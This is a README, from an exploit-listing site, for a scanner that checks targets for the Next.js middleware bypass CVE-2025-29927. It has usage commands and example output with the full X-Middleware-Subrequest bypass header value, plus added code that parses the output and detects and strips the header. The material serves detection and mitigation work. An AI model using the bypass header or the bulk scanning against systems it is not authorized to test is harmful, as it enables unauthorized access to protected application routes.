## https://sploitus.com/exploit?id=7DB3F718-5315-504D-B64C-72D80A46718B
# CVE-2025-29927
## Next.js Middleware Bypass Scanner (CVE-2025-29927)
This repository (CVE-2025-29927) is a specialized scanner for detecting the Next.js middleware bypass vulnerability (CVE-2025-29927), which affects Next.js versions 11.1.4 through 15.2.2. This critical vulnerability allows attackers to bypass security controls by sending a specially crafted HTTP header.
## About the Vulnerability
The Next.js middleware bypass vulnerability (CVE-2025-29927) allows attackers to circumvent authorization controls by sending a malicious `X-Middleware-Subrequest` header that confuses the middleware processing logic. This can lead to unauthorized access to protected resources and routes.
**CVSS Score:** 9.1 (Critical)
## Features
- Fast concurrent scanning of multiple targets
- SSL certificate verification bypass option for IP-based scanning
- Silent mode for automation and focused output
- Detailed vulnerability information (status codes, bypass headers)
- Endpoint discovery for comprehensive testing
## Installation
```bash
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
```
## Usage
```bash
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
```
### Command Line Arguments
- `-t, --target`: Single target to scan (e.g., example.com or https://example.com)
- `-f, --file`: File containing list of targets (one per line)
- `-c, --concurrency`: Number of concurrent scans (default: 5)
- `-k, --insecure`: Disable SSL certificate verification (useful for IP addresses)
- `-s, --silent`: Silent mode - only show vulnerable targets
### Examples
Scan a single target:
```bash
python CVE-2025-29927.py -t example.com
```
Scan multiple targets from a file:
```bash
python CVE-2025-29927.py -f targets.txt
```
Scan with SSL verification disabled:
```bash
python CVE-2025-29927.py -t 192.168.1.1 -k
```
Automated scanning with silent mode:
```bash
python CVE-2025-29927.py -f targets.txt -k -s
```
Scan with a custom header:
```bash
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
```
## Output
For vulnerable targets, MiddleWay displays:
- The vulnerable endpoint
- Original status code
- Bypassed status code
- The bypass header used for successful exploitation
Example output:
```
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
```
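Silent mode is meant for automation, so the output above usually ends up being consumed by a script rather than read by hand. The following parser is an added example (not part of the scanner's own code) that turns that line-oriented output into records and groups bypassable endpoints per target; the sample output it runs on is constructed here, reusing the header value from the example above, and the banner-free format is assumed to match exactly what the README shows.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of the scanner's output (not a capture from a real run); both
# findings reuse the header value shown in the README's example output.
PAGE_HEADER_VALUE = (
    "X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:"
    "src/middleware:src/middleware:middleware:middleware:nowaf:middleware:"
    "middleware:middleware:pages/_middleware"
)
SAMPLE_OUTPUT = f"""\
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: {PAGE_HEADER_VALUE}
[VULNERABLE] https://app.example.org - Endpoint /dashboard can be bypassed
Original status: 307
Bypassed status: 200
Bypass header: {PAGE_HEADER_VALUE}
"""

# "[VULNERABLE] <target> - Endpoint <path> can be bypassed"
FINDING_RE = re.compile(
    r"^\[VULNERABLE\]\s+(?P<target>\S+)\s+-\s+Endpoint\s+(?P<endpoint>\S+)\s+can be bypassed"
)


@dataclass
class Finding:
    target: str
    endpoint: str
    original_status: Optional[int] = None
    bypassed_status: Optional[int] = None
    bypass_header: Optional[str] = None


def parse_findings(text: str) -> List[Finding]:
    """Turn the scanner's line-oriented output into Finding records.

    Detail lines (status codes, header) attach to the most recent [VULNERABLE]
    line; any other line (banner, progress output) is ignored.
    """
    findings: List[Finding] = []
    current: Optional[Finding] = None
    for raw in text.splitlines():
        line = raw.strip()
        match = FINDING_RE.match(line)
        if match:
            current = Finding(match["target"], match["endpoint"])
            findings.append(current)
            continue
        if current is None:
            continue
        if line.startswith("Original status:"):
            current.original_status = int(line.split(":", 1)[1])
        elif line.startswith("Bypassed status:"):
            current.bypassed_status = int(line.split(":", 1)[1])
        elif line.startswith("Bypass header:"):
            current.bypass_header = line.split(":", 1)[1].strip()
    return findings


def endpoints_by_target(findings: List[Finding]) -> Dict[str, List[str]]:
    """Group bypassable endpoints per target, e.g. to open one ticket per host."""
    grouped: Dict[str, List[str]] = {}
    for f in findings:
        grouped.setdefault(f.target, []).append(f.endpoint)
    return grouped


if __name__ == "__main__":
    for f in parse_findings(SAMPLE_OUTPUT):
        print(f"{f.target}{f.endpoint}: {f.original_status} -> {f.bypassed_status}")
```

Feed it the scanner's stdout (for example `python CVE-2025-29927.py -f targets.txt -s | python parse.py`) and the grouped result is ready for a ticketing system or a dashboard; unknown lines are skipped, so additional scanner chatter does not break the parse.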
## Mitigation
To mitigate this vulnerability:
1. Upgrade to Next.js 14.2.25 or 15.2.3, or a later release
2. If upgrading is not possible, strip or block the `X-Middleware-Subrequest` header at your WAF or web server, so that it never reaches the application
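The second mitigation comes down to one rule: `X-Middleware-Subrequest` is a Next.js-internal header, so an external client has no legitimate reason to send it, and its mere presence on an inbound request is both the thing to strip and the thing to alert on. The code below is an added example, not part of this scanner or of Next.js: `inspect_request` removes the header from a request and reports whether it was there (the kind of check a proxy hook or WAF custom rule would apply), and `scan_access_log` replays a constructed JSON-lines access log (a hypothetical log format, not that of any particular proxy) through it to surface past attempts. The flagged entry reuses the header value from the example output above.

```python
import json
from typing import Dict, List, Mapping, NamedTuple

HEADER_NAME = "x-middleware-subrequest"


class Verdict(NamedTuple):
    headers: Dict[str, str]   # request headers with X-Middleware-Subrequest removed
    flagged: bool             # True if the header was present at all
    segments: int             # colon-separated entries in the offending value
    middleware_segments: int  # of those, how many name a middleware module


def inspect_request(headers: Mapping[str, str]) -> Verdict:
    """Strip X-Middleware-Subrequest from an inbound request and report if it was there.

    Presence alone is the detection signal; the segment counts only add context
    for the alert (the reported bypass values are long chains of middleware names).
    """
    cleaned: Dict[str, str] = {}
    offending = None
    for name, value in headers.items():
        if name.lower() == HEADER_NAME:  # header names are case-insensitive
            offending = value
            continue
        cleaned[name] = value
    if offending is None:
        return Verdict(cleaned, False, 0, 0)
    parts = [p for p in offending.split(":") if p]
    named = sum(1 for p in parts if "middleware" in p.lower())
    return Verdict(cleaned, True, len(parts), named)


# Constructed JSON-lines access log (hypothetical format, not from any real proxy);
# the first entry reuses the header value from the README's example output.
PAGE_HEADER_VALUE = (
    "src/middleware:nowaf:src/middleware:src/middleware:src/middleware:"
    "src/middleware:middleware:middleware:nowaf:middleware:middleware:"
    "middleware:pages/_middleware"
)
SAMPLE_ACCESS_LOG = [
    json.dumps({"ts": "2025-03-23T10:00:01Z", "src": "203.0.113.7", "path": "/admin",
                "status": 200, "headers": {"host": "example.com", HEADER_NAME: PAGE_HEADER_VALUE}}),
    json.dumps({"ts": "2025-03-23T10:00:02Z", "src": "198.51.100.4", "path": "/",
                "status": 200, "headers": {"host": "example.com", "user-agent": "Mozilla/5.0"}}),
    json.dumps({"ts": "2025-03-23T10:00:03Z", "src": "198.51.100.4", "path": "/admin",
                "status": 401, "headers": {"host": "example.com"}}),
]


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Replay logged requests through inspect_request and return the flagged ones."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        entry = json.loads(line)
        verdict = inspect_request(entry.get("headers", {}))
        if verdict.flagged:
            hits.append({
                "ts": entry["ts"], "src": entry["src"], "path": entry["path"],
                "status": entry["status"], "segments": verdict.segments,
                "middleware_segments": verdict.middleware_segments,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
```

A flagged entry whose status is 200 on a route that otherwise answers 401 (the first sample line against the third) is the pattern worth paging on, since it indicates the bypass succeeded rather than merely being attempted; the stripping half of `inspect_request` is the interim control until the upgrade in step 1 lands.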
## Disclaimer
This tool is provided for security research and defensive purposes only. Always obtain proper authorization before scanning any systems you don't own. The authors are not responsible for any misuse of this tool.
## License
MIT